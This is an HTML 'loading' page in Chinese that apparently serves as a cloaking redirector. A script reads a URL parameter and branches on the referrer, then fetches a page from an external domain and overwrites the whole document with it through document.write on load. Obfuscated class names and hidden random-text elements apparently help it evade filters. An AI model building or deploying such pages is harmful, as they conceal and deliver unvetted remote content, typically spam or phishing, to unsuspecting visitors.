<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .V47TeeXU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .V47TeeXU .Vyg5OPtPT1l {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .V47TeeXU .content {
            line-height: 50px;
            text-align: center
        }

        .V47TeeXU .img {
            width: 100%
        }

        .V47TeeXU .vfPzTAcSKrK {
            text-align: center
        }

        .V47TeeXU .vfPzTAcSKrK span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .V47TeeXU .vfPzTAcSKrK span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .V47TeeXU .vfPzTAcSKrK span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .V47TeeXU .vfPzTAcSKrK span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .V47TeeXU .vfPzTAcSKrK span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .V47TeeXU .vfPzTAcSKrK span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .V47TeeXU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function OfoEls8dkPTp(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wJYk9a = OfoEls8dkPTp('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wJYk9a +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wJYk9a +".html?a=share";
		}
		
        RDjfPf=url+"#"+new Date().getTime();
        RDjfPf && function() {
            $.get(RDjfPf, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>TEqLvN8i6TXS9erMgTJUHbVMMSwZUAvkpae7gHqfx83zVomyrqT0STP7PDwr1YxwS7n8EJRkjxUacwzVGjXlzTBQhSYqLyxx</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>oXFAgi3HIDyhG5XDq1Zgk5UGntKhyeC5pukUe7CnLCbnDpzG</a><div class="V47TeeXU">
    <div class="Vyg5OPtPT1l">
        <div class="vfPzTAcSKrK">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>B7ilz5QlYPOsEYj55UFd0jpJkW6ncx0Clh6DLSMbiv1G7XJjrVHTMQ7uUQ6ud1YgXZujKmzBGC4FhAs5SIhXLbQ43m</span>
<p  style='display:none'>XeqyyiGqRpjr4myLikixgxppk7Tct</p>
<h1 style='display:none' >toyIQ0ODOdDXCHKyW5E7KHzpMLvxvjThzCTAk72EmkAAANOHdEGVNL0fqVGZ8GUYWseh9GyK8Gtv</h1>
<div style='display:none'>osweQm1QW8AqH7Su5af7L8n9lQXgIAI384UdeYmAEx8mGgn1NI4JelDDf3aqirU1rHQa</div>
<h1 style='display:none' >toyIQ0ODOdDXCHKyW5E7KHzpMLvxvjThzCTAk72EmkAAANOHdEGVNL0fqVGZ8GUYWseh9GyK8Gtv</h1>
<span style='display:none'>B7ilz5QlYPOsEYj55UFd0jpJkW6ncx0Clh6DLSMbiv1G7XJjrVHTMQ7uUQ6ud1YgXZujKmzBGC4FhAs5SIhXLbQ43m</span>
<li style='display:none' >dFfBF8AOph9JsFnT1v7i9nTlXNo</li></body>
</html>